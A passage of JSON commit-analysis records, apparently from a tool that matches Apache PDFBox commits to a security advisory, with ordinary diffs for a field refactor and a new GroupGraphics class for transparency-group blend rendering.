"COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4256", - "relevance": 2 - } - ] - }, - { - "commit_id": "28729eb34537a04e522c604906925e9a8024b34f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525925984, - "hunks": 15, - "message": "PDFBOX-4068: bug fix - remove duplicated fields from PDPageContentStream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831301 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "index b66e1e0ba..0d3eb8ca2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "@@ -60,7 +60,7 @@ abstract class PDAbstractContentStream implements Closeable", - "- private boolean inTextMode = false;", - "- private final Stack fontStack = new Stack<>();", - "+ protected boolean inTextMode = false;", - "+ protected final Stack fontStack = new Stack<>();", - "- private final Stack nonStrokingColorSpaceStack = new Stack<>();", - "- private final Stack strokingColorSpaceStack = new Stack<>();", - "+ protected final Stack nonStrokingColorSpaceStack = new Stack<>();", - "+ protected final Stack strokingColorSpaceStack = new Stack<>();", - "@@ -104,3 +104,3 @@ abstract class PDAbstractContentStream implements Closeable", - " }", - "- ", - "+", - " public OutputStream getOutputStream()", - "@@ -114,3 +114,3 @@ abstract class PDAbstractContentStream implements Closeable", - " }", - "- ", - "+", - " public PDResources getResources()", - "@@ -124,18 +124,2 @@ abstract class PDAbstractContentStream implements Closeable", - " }", - "- ", - "- public Stack getStrokingColorSpaceStack()", - "- {", - "- return strokingColorSpaceStack;", - "- }", - "-", - "- public Stack getNonStrokingColorSpaceStack()", - "- {", - "- return nonStrokingColorSpaceStack;", - "- }", - "-", - "- ", - "- public boolean isInTextMode()", - "- {", - "- return inTextMode;", - "- }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index 6d4cc2bb4..d9032a819 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -30,3 +30,2 @@ import java.util.Map;", - " import java.util.Set;", - "-import java.util.Stack;", - " import java.util.regex.Pattern;", - "@@ -102,7 +101,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- private final Stack fontStack = new Stack<>();", - "-", - "- private final Stack nonStrokingColorSpaceStack = new Stack<>();", - "- private final Stack strokingColorSpaceStack = new Stack<>();", - "-", - " private final Map gsubWorkers = new HashMap<>();", - "@@ -330,3 +324,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (!isInTextMode())", - "+ if (!inTextMode)", - " {", - "@@ -537,3 +531,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -790,3 +784,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -865,3 +859,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -888,3 +882,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -909,3 +903,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -942,3 +936,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -961,3 +955,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {", - "@@ -1016,3 +1010,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- if (isInTextMode())", - "+ if (inTextMode)", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: page", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "3e526fabd47194f9faa0042dfab92ac6cc3b41cb", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530377414, - "hunks": 19, - "message": "PDFBOX-3000: support rendering of blend modes in non-isolated transparency groups, by Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834751 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "new file mode 100644", - "index 000000000..b21ca1e6f", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "@@ -0,0 +1,728 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.rendering;", - "+", - "+import java.awt.Color;", - "+import java.awt.Composite;", - "+import java.awt.Font;", - "+import java.awt.FontMetrics;", - "+import java.awt.Graphics;", - "+import java.awt.Graphics2D;", - "+import java.awt.GraphicsConfiguration;", - "+import java.awt.Image;", - "+import java.awt.Paint;", - "+import java.awt.Rectangle;", - "+import java.awt.RenderingHints;", - "+import java.awt.Shape;", - "+import java.awt.Stroke;", - "+import java.awt.font.FontRenderContext;", - "+import java.awt.font.GlyphVector;", - "+import java.awt.geom.AffineTransform;", - "+import java.awt.image.BufferedImage;", - "+import java.awt.image.BufferedImageOp;", - "+import java.awt.image.DataBuffer;", - "+import java.awt.image.DataBufferInt;", - "+import java.awt.image.ImageObserver;", - "+import java.awt.image.RenderedImage;", - "+import java.awt.image.renderable.RenderableImage;", - "+import java.text.AttributedCharacterIterator;", - "+import java.util.Map;", - "+", - "+/**", - "+ * Graphics implementation for non-isolated transparency groups.", - "+ *

    ", - "+ * Non-isolated groups require that the group backdrop (copied from parent group or", - "+ * page) is used as the initial contents of the image to which the group is rendered.", - "+ * This allows blend modes to blend the group contents with the graphics behind", - "+ * the group. Finally when the group rendering is done, backdrop removal must be", - "+ * computed (see {@link #removeBackdrop(java.awt.image.BufferedImage, int, int) removeBackdrop}).", - "+ * It ensures the backdrop is not rendered twice on the parent but it leaves the", - "+ * effects of blend modes.", - "+ *

    ", - "+ * This class renders the group contents to two images. groupImage is", - "+ * initialized with the backdrop and group contents are drawn over it.", - "+ * groupAlphaImage is initially fully transparent and it accumulates", - "+ * the total alpha of the group contents excluding backdrop.", - "+ *

    ", - "+ * If a non-isolated group uses only the blend mode Normal, it can be optimized", - "+ * and rendered like an isolated group; backdrop usage and removal are not needed.", - "+ */", - "+", - "+class GroupGraphics extends Graphics2D", - "+{", - "+ private final BufferedImage groupImage;", - "+ private final BufferedImage groupAlphaImage;", - "+ private final Graphics2D groupGraphics;", - "+ private final Graphics2D alphaGraphics;", - "+", - "+ GroupGraphics(BufferedImage groupImage, Graphics2D groupGraphics)", - "+ {", - "+ this.groupImage = groupImage;", - "+ this.groupGraphics = groupGraphics;", - "+ this.groupAlphaImage = new BufferedImage(groupImage.getWidth(), groupImage.getHeight(),", - "+ BufferedImage.TYPE_INT_ARGB);", - "+ this.alphaGraphics = groupAlphaImage.createGraphics();", - "+ }", - "+", - "+ private GroupGraphics(BufferedImage groupImage, Graphics2D groupGraphics,", - "+ BufferedImage groupAlphaImage, Graphics2D alphaGraphics)", - "+ {", - "+ this.groupImage = groupImage;", - "+ this.groupGraphics = groupGraphics;", - "+ this.groupAlphaImage = groupAlphaImage;", - "+ this.alphaGraphics = alphaGraphics;", - "+ }", - "+", - "+ @Override", - "+ public void clearRect(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.clearRect(x, y, width, height);", - "+ alphaGraphics.clearRect(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void clipRect(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.clipRect(x, y, width, height);", - "+ alphaGraphics.clipRect(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void copyArea(int x, int y, int width, int height, int dx, int dy)", - "+ {", - "+ groupGraphics.copyArea(x, y, width, height, dx, dy);", - "+ alphaGraphics.copyArea(x, y, width, height, dx, dy);", - "+ }", - "+", - "+ @Override", - "+ public Graphics create()", - "+ {", - "+ Graphics g = groupGraphics.create();", - "+ Graphics a = alphaGraphics.create();", - "+ if (g instanceof Graphics2D && a instanceof Graphics2D)", - "+ {", - "+ return new GroupGraphics(groupImage, (Graphics2D)g, groupAlphaImage, (Graphics2D)a);", - "+ }", - "+ throw new UnsupportedOperationException();", - "+ }", - "+", - "+ @Override", - "+ public void dispose()", - "+ {", - "+ groupGraphics.dispose();", - "+ alphaGraphics.dispose();", - "+ }", - "+", - "+ @Override", - "+ public void drawArc(int x, int y, int width, int height, int startAngle, int arcAngle)", - "+ {", - "+ groupGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", - "+ alphaGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int x, int y, Color bgcolor, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, x, y, bgcolor, observer);", - "+ return alphaGraphics.drawImage(img, x, y, bgcolor, observer);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int x, int y, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, x, y, observer);", - "+ return alphaGraphics.drawImage(img, x, y, observer);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int x, int y, int width, int height,", - "+ Color bgcolor, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", - "+ return alphaGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int x, int y, int width, int height, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, x, y, width, height, observer);", - "+ return alphaGraphics.drawImage(img, x, y, width, height, observer);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int dx1, int dy1, int dx2, int dy2, int sx1,", - "+ int sy1, int sx2, int sy2, Color bgcolor, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - "+ return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, int dx1, int dy1, int dx2, int dy2, int sx1,", - "+ int sy1, int sx2, int sy2, ImageObserver observer)", - "+ {", - "+ groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - "+ return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - "+ }", - "+", - "+ @Override", - "+ public void drawLine(int x1, int y1, int x2, int y2)", - "+ {", - "+ groupGraphics.drawLine(x1, y1, x2, y2);", - "+ alphaGraphics.drawLine(x1, y1, x2, y2);", - "+ }", - "+", - "+ @Override", - "+ public void drawOval(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.drawOval(x, y, width, height);", - "+ alphaGraphics.drawOval(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void drawPolygon(int[] xPoints, int[] yPoints, int nPoints)", - "+ {", - "+ groupGraphics.drawPolygon(xPoints, yPoints, nPoints);", - "+ alphaGraphics.drawPolygon(xPoints, yPoints, nPoints);", - "+ }", - "+", - "+ @Override", - "+ public void drawPolyline(int[] xPoints, int[] yPoints, int nPoints)", - "+ {", - "+ groupGraphics.drawPolyline(xPoints, yPoints, nPoints);", - "+ alphaGraphics.drawPolyline(xPoints, yPoints, nPoints);", - "+ }", - "+", - "+ @Override", - "+ public void drawRoundRect(int x, int y, int width, int height, int arcWidth, int arcHeight)", - "+ {", - "+ groupGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ alphaGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ }", - "+", - "+ @Override", - "+ public void drawString(AttributedCharacterIterator iterator, int x, int y)", - "+ {", - "+ groupGraphics.drawString(iterator, x, y);", - "+ alphaGraphics.drawString(iterator, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void drawString(String str, int x, int y)", - "+ {", - "+ groupGraphics.drawString(str, x, y);", - "+ alphaGraphics.drawString(str, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void fillArc(int x, int y, int width, int height, int startAngle, int arcAngle)", - "+ {", - "+ groupGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", - "+ alphaGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", - "+ }", - "+", - "+ @Override", - "+ public void fillOval(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.fillOval(x, y, width, height);", - "+ alphaGraphics.fillOval(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void fillPolygon(int[] xPoints, int[] yPoints, int nPoints)", - "+ {", - "+ groupGraphics.fillPolygon(xPoints, yPoints, nPoints);", - "+ alphaGraphics.fillPolygon(xPoints, yPoints, nPoints);", - "+ }", - "+", - "+ @Override", - "+ public void fillRect(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.fillRect(x, y, width, height);", - "+ alphaGraphics.fillRect(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void fillRoundRect(int x, int y, int width, int height, int arcWidth, int arcHeight)", - "+ {", - "+ groupGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ alphaGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ }", - "+", - "+ @Override", - "+ public Shape getClip()", - "+ {", - "+ return groupGraphics.getClip();", - "+ }", - "+", - "+ @Override", - "+ public Rectangle getClipBounds()", - "+ {", - "+ return groupGraphics.getClipBounds();", - "+ }", - "+", - "+ @Override", - "+ public Color getColor()", - "+ {", - "+ return groupGraphics.getColor();", - "+ }", - "+", - "+ @Override", - "+ public Font getFont()", - "+ {", - "+ return groupGraphics.getFont();", - "+ }", - "+", - "+ @Override", - "+ public FontMetrics getFontMetrics(Font f)", - "+ {", - "+ return groupGraphics.getFontMetrics(f);", - "+ }", - "+", - "+ @Override", - "+ public void setClip(int x, int y, int width, int height)", - "+ {", - "+ groupGraphics.setClip(x, y, width, height);", - "+ alphaGraphics.setClip(x, y, width, height);", - "+ }", - "+", - "+ @Override", - "+ public void setClip(Shape clip)", - "+ {", - "+ groupGraphics.setClip(clip);", - "+ alphaGraphics.setClip(clip);", - "+ }", - "+", - "+ @Override", - "+ public void setColor(Color c)", - "+ {", - "+ groupGraphics.setColor(c);", - "+ alphaGraphics.setColor(c);", - "+ }", - "+", - "+ @Override", - "+ public void setFont(Font font)", - "+ {", - "+ groupGraphics.setFont(font);", - "+ alphaGraphics.setFont(font);", - "+ }", - "+", - "+ @Override", - "+ public void setPaintMode()", - "+ {", - "+ groupGraphics.setPaintMode();", - "+ alphaGraphics.setPaintMode();", - "+ }", - "+", - "+ @Override", - "+ public void setXORMode(Color c1)", - "+ {", - "+ groupGraphics.setXORMode(c1);", - "+ alphaGraphics.setXORMode(c1);", - "+ }", - "+", - "+ @Override", - "+ public void translate(int x, int y)", - "+ {", - "+ groupGraphics.translate(x, y);", - "+ alphaGraphics.translate(x, y);", - "+ }", - "+", - "+ @Override", - "+ public void addRenderingHints(Map hints)", - "+ {", - "+ groupGraphics.addRenderingHints(hints);", - "+ alphaGraphics.addRenderingHints(hints);", - "+ }", - "+", - "+ @Override", - "+ public void clip(Shape s)", - "+ {", - "+ groupGraphics.clip(s);", - "+ alphaGraphics.clip(s);", - "+ }", - "+", - "+ @Override", - "+ public void draw(Shape s)", - "+ {", - "+ groupGraphics.draw(s);", - "+ alphaGraphics.draw(s);", - "+ }", - "+", - "+ @Override", - "+ public void drawGlyphVector(GlyphVector g, float x, float y)", - "+ {", - "+ groupGraphics.drawGlyphVector(g, x, y);", - "+ alphaGraphics.drawGlyphVector(g, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void drawImage(BufferedImage img, BufferedImageOp op, int x, int y)", - "+ {", - "+ groupGraphics.drawImage(img, op, x, y);", - "+ alphaGraphics.drawImage(img, op, x, y);", - "+ }", - "+", - "+ @Override", - "+ public boolean drawImage(Image img, AffineTransform xform, ImageObserver obs)", - "+ {", - "+ groupGraphics.drawImage(img, xform, obs);", - "+ return alphaGraphics.drawImage(img, xform, obs);", - "+ }", - "+", - "+ @Override", - "+ public void drawRenderableImage(RenderableImage img, AffineTransform xform)", - "+ {", - "+ groupGraphics.drawRenderableImage(img, xform);", - "+ alphaGraphics.drawRenderableImage(img, xform);", - "+ }", - "+", - "+ @Override", - "+ public void drawRenderedImage(RenderedImage img, AffineTransform xform)", - "+ {", - "+ groupGraphics.drawRenderedImage(img, xform);", - "+ alphaGraphics.drawRenderedImage(img, xform);", - "+ }", - "+", - "+ @Override", - "+ public void drawString(AttributedCharacterIterator iterator, float x, float y)", - "+ {", - "+ groupGraphics.drawString(iterator, x, y);", - "+ alphaGraphics.drawString(iterator, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void drawString(String str, float x, float y)", - "+ {", - "+ groupGraphics.drawString(str, x, y);", - "+ alphaGraphics.drawString(str, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void fill(Shape s)", - "+ {", - "+ groupGraphics.fill(s);", - "+ alphaGraphics.fill(s);", - "+ }", - "+", - "+ @Override", - "+ public Color getBackground()", - "+ {", - "+ return groupGraphics.getBackground();", - "+ }", - "+", - "+ @Override", - "+ public Composite getComposite()", - "+ {", - "+ return groupGraphics.getComposite();", - "+ }", - "+", - "+ @Override", - "+ public GraphicsConfiguration getDeviceConfiguration()", - "+ {", - "+ return groupGraphics.getDeviceConfiguration();", - "+ }", - "+", - "+ @Override", - "+ public FontRenderContext getFontRenderContext()", - "+ {", - "+ return groupGraphics.getFontRenderContext();", - "+ }", - "+", - "+ @Override", - "+ public Paint getPaint()", - "+ {", - "+ return groupGraphics.getPaint();", - "+ }", - "+", - "+ @Override", - "+ public Object getRenderingHint(RenderingHints.Key hintKey)", - "+ {", - "+ return groupGraphics.getRenderingHint(hintKey);", - "+ }", - "+", - "+ @Override", - "+ public RenderingHints getRenderingHints()", - "+ {", - "+ return groupGraphics.getRenderingHints();", - "+ }", - "+", - "+ @Override", - "+ public Stroke getStroke()", - "+ {", - "+ return groupGraphics.getStroke();", - "+ }", - "+", - "+ @Override", - "+ public AffineTransform getTransform()", - "+ {", - "+ return groupGraphics.getTransform();", - "+ }", - "+", - "+ @Override", - "+ public boolean hit(Rectangle rect, Shape s, boolean onStroke)", - "+ {", - "+ return groupGraphics.hit(rect, s, onStroke);", - "+ }", - "+", - "+ @Override", - "+ public void rotate(double theta)", - "+ {", - "+ groupGraphics.rotate(theta);", - "+ alphaGraphics.rotate(theta);", - "+ }", - "+", - "+ @Override", - "+ public void rotate(double theta, double x, double y)", - "+ {", - "+ groupGraphics.rotate(theta, x, y);", - "+ alphaGraphics.rotate(theta, x, y);", - "+ }", - "+", - "+ @Override", - "+ public void scale(double sx, double sy)", - "+ {", - "+ groupGraphics.scale(sx, sy);", - "+ alphaGraphics.scale(sx, sy);", - "+ }", - "+", - "+ @Override", - "+ public void setBackground(Color color)", - "+ {", - "+ groupGraphics.setBackground(color);", - "+ alphaGraphics.setBackground(color);", - "+ }", - "+", - "+ @Override", - "+ public void setComposite(Composite comp)", - "+ {", - "+ groupGraphics.setComposite(comp);", - "+ alphaGraphics.setComposite(comp);", - "+ }", - "+", - "+ @Override", - "+ public void setPaint(Paint paint)", - "+ {", - "+ groupGraphics.setPaint(paint);", - "+ alphaGraphics.setPaint(paint);", - "+ }", - "+", - "+ @Override", - "+ public void setRenderingHint(RenderingHints.Key hintKey, Object hintValue)", - "+ {", - "+ groupGraphics.setRenderingHint(hintKey, hintValue);", - "+ alphaGraphics.setRenderingHint(hintKey, hintValue);", - "+ }", - "+", - "+ @Override", - "+ public void setRenderingHints(Map hints)", - "+ {", - "+ groupGraphics.setRenderingHints(hints);", - "+ alphaGraphics.setRenderingHints(hints);", - "+ }", - "+", - "+ @Override", - "+ public void setStroke(Stroke s)", - "+ {", - "+ groupGraphics.setStroke(s);", - "+ alphaGraphics.setStroke(s);", - "+ }", - "+", - "+ @Override", - "+ public void setTransform(AffineTransform tx)", - "+ {", - "+ groupGraphics.setTransform(tx);", - "+ alphaGraphics.setTransform(tx);", - "+ }", - "+", - "+ @Override", - "+ public void shear(double shx, double shy)", - "+ {", - "+ groupGraphics.shear(shx, shy);", - "+ alphaGraphics.shear(shx, shy);", - "+ }", - "+", - "+ @Override", - "+ public void transform(AffineTransform tx)", - "+ {", - "+ groupGraphics.transform(tx);", - "+ alphaGraphics.transform(tx);", - "+ }", - "+", - "+ @Override", - "+ public void translate(double tx, double ty)", - "+ {", - "+ groupGraphics.translate(tx, ty);", - "+ alphaGraphics.translate(tx, ty);", - "+ }", - "+", - "+ /**", - "+ * Computes backdrop removal.", - "+ * The backdrop removal equation is given in section 11.4.4 in the PDF 32000-1:2008", - "+ * standard. It returns the final color C for each pixel in the group:
    ", - "+ * C = Cn + (Cn - C0) * (alpha0 / alphagn - alpha0)
    ", - "+ * where
    ", - "+ * Cn is the group color including backdrop (read from groupImage),
    ", - "+ * C0 is the backdrop color,
    ", - "+ * alpha0 is the backdrop alpha,
    ", - "+ * alphagn is the group alpha excluding backdrop (read the", - "+ * alpha channel from groupAlphaImage)
    ", - "+ *

    ", - "+ * The alpha of the result is equal to alphagn, i.e., the alpha", - "+ * channel of groupAlphaImage.", - "+ *

    ", - "+ * The backdrop image may be much larger than groupImage if,", - "+ * for example, the current page is used as the backdrop. Only a specific rectangular", - "+ * region of backdrop is used in the backdrop removal: upper-left corner", - "+ * is at (offsetX, offsetY); width and height are equal to those of", - "+ * groupImage.", - "+ *", - "+ * @param backdrop group backdrop", - "+ * @param offsetX backdrop left X coordinate", - "+ * @param offsetY backdrop upper Y coordinate", - "+ */", - "+ void removeBackdrop(BufferedImage backdrop, int offsetX, int offsetY)", - "+ {", - "+ int groupWidth = groupImage.getWidth();", - "+ int groupHeight = groupImage.getHeight();", - "+ int backdropWidth = backdrop.getWidth();", - "+ int backdropHeight = backdrop.getHeight();", - "+ int groupType = groupImage.getType();", - "+ int groupAlphaType = groupAlphaImage.getType();", - "+ int backdropType = backdrop.getType();", - "+ DataBuffer groupDataBuffer = groupImage.getRaster().getDataBuffer();", - "+ DataBuffer groupAlphaDataBuffer = groupAlphaImage.getRaster().getDataBuffer();", - "+ DataBuffer backdropDataBuffer = backdrop.getRaster().getDataBuffer();", - "+", - "+ if (groupType == BufferedImage.TYPE_INT_ARGB &&", - "+ groupAlphaType == BufferedImage.TYPE_INT_ARGB &&", - "+ (backdropType == BufferedImage.TYPE_INT_ARGB || backdropType == BufferedImage.TYPE_INT_RGB) &&", - "+ groupDataBuffer instanceof DataBufferInt &&", - "+ groupAlphaDataBuffer instanceof DataBufferInt &&", - "+ backdropDataBuffer instanceof DataBufferInt)", - "+ {", - "+ // Optimized computation for int[] buffers.", - "+", - "+ int[] groupData = ((DataBufferInt)groupDataBuffer).getData();", - "+ int[] groupAlphaData = ((DataBufferInt)groupAlphaDataBuffer).getData();", - "+ int[] backdropData = ((DataBufferInt)backdropDataBuffer).getData();", - "+ boolean backdropHasAlpha = backdropType == BufferedImage.TYPE_INT_ARGB;", - "+", - "+ for (int y = 0; y < groupHeight; y++)", - "+ {", - "+ for (int x = 0; x < groupWidth; x++)", - "+ {", - "+ int index = x + y * groupWidth;", - "+", - "+ // alphagn is the total alpha of the group contents excluding backdrop.", - "+ int alphagn = (groupAlphaData[index] >> 24) & 0xFF;", - "+ if (alphagn == 0)", - "+ {", - "+ // Avoid division by 0 and set the result to fully transparent.", - "+ groupData[index] = 0;", - "+ continue;", - "+ }", - "+", - "+ int backdropX = x + offsetX;", - "+ int backdropY = y + offsetY;", - "+ int backdropRGB; // color of backdrop pixel", - "+ float alpha0; // alpha of backdrop pixel", - "+", - "+ if (backdropX >= 0 && backdropX < backdropWidth &&", - "+ backdropY >= 0 && backdropY < backdropHeight)", - "+ {", - "+ backdropRGB = backdropData[backdropX + backdropY * backdropWidth];", - "+ alpha0 = backdropHasAlpha ? ((backdropRGB >> 24) & 0xFF) : 255;", - "+ }", - "+ else", - "+ {", - "+ // Backdrop pixel is out of bounds. Use a transparent value.", - "+ backdropRGB = 0;", - "+ alpha0 = 0;", - "+ }", - "+", - "+ // Alpha factor alpha0 / alphagn - alpha0 is in range 0.0-1.0.", - "+ float alphaFactor = alpha0 / (float)alphagn - alpha0 / 255.0f;", - "+ int groupRGB = groupData[index]; // color of group pixel", - "+", - "+ // Compute backdrop removal for RGB components.", - "+ int r = backdropRemoval(groupRGB, backdropRGB, 16, alphaFactor);", - "+ int g = backdropRemoval(groupRGB, backdropRGB, 8, alphaFactor);", - "+ int b = backdropRemoval(groupRGB, backdropRGB, 0, alphaFactor);", - "+", - "+ // Copy the result back to groupImage. The alpha of the result", - "+ // is equal to alphagn.", - "+ groupData[index] = (alphagn << 24) | (r << 16) | (g << 8) | b;", - "+ }", - "+ }", - "+ }", - "+ else", - "+ {", - "+ // Non-optimized computation for other types of color spaces and pixel buffers.", - "+", - "+ for (int y = 0; y < groupHeight; y++)", - "+ {", - "+ for (int x = 0; x < groupWidth; x++)", - "+ {", - "+ int alphagn = (groupAlphaImage.getRGB(x, y) >> 24) & 0xFF;", - "+ if (alphagn == 0)", - "+ {", - "+ groupImage.setRGB(x, y, 0);", - "+ continue;", - "+ }", - "+", - "+ int backdropX = x + offsetX;", - "+ int backdropY = y + offsetY;", - "+ int backdropRGB;", - "+ float alpha0;", - "+ if (backdropX >= 0 && backdropX < backdropWidth &&", - "+ backdropY >= 0 && backdropY < backdropHeight)", - "+ {", - "+ backdropRGB = backdrop.getRGB(backdropX, backdropY);", - "+ alpha0 = (backdropRGB >> 24) & 0xFF;", - "+ }", - "+ else", - "+ {", - "+ backdropRGB = 0;", - "+ alpha0 = 0;", - "+ }", - "+", - "+ int groupRGB = groupImage.getRGB(x, y);", - "+ float alphaFactor = alpha0 / alphagn - alpha0 / 255.0f;", - "+", - "+ int r = backdropRemoval(groupRGB, backdropRGB, 16, alphaFactor);", - "+ int g = backdropRemoval(groupRGB, backdropRGB, 8, alphaFactor);", - "+ int b = backdropRemoval(groupRGB, backdropRGB, 0, alphaFactor);", - "+", - "+ groupImage.setRGB(x, y, (alphagn << 24) | (r << 16) | (g << 8) | b);", - "+ }", - "+ }", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Computes the backdrop removal equation.", - "+ * C = Cn + (Cn - C0) * (alpha0 / alphagn - alpha0)", - "+ */", - "+ private int backdropRemoval(int groupRGB, int backdropRGB, int shift, float alphaFactor)", - "+ {", - "+ float cn = (groupRGB >> shift) & 0xFF;", - "+ float c0 = (backdropRGB >> shift) & 0xFF;", - "+ int c = Math.round(cn + (cn - c0) * alphaFactor);", - "+ return (c < 0) ? 0 : (c > 255 ? 255 : c);", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "index ee2a988cd..6c50da373 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "@@ -57,2 +57,4 @@ public class PDFRenderer", - "+ private BufferedImage pageImage;", - "+", - " /**", - "@@ -207,2 +209,4 @@ public class PDFRenderer", - "+ pageImage = image;", - "+", - " // use a transparent background if the image type supports alpha", - "@@ 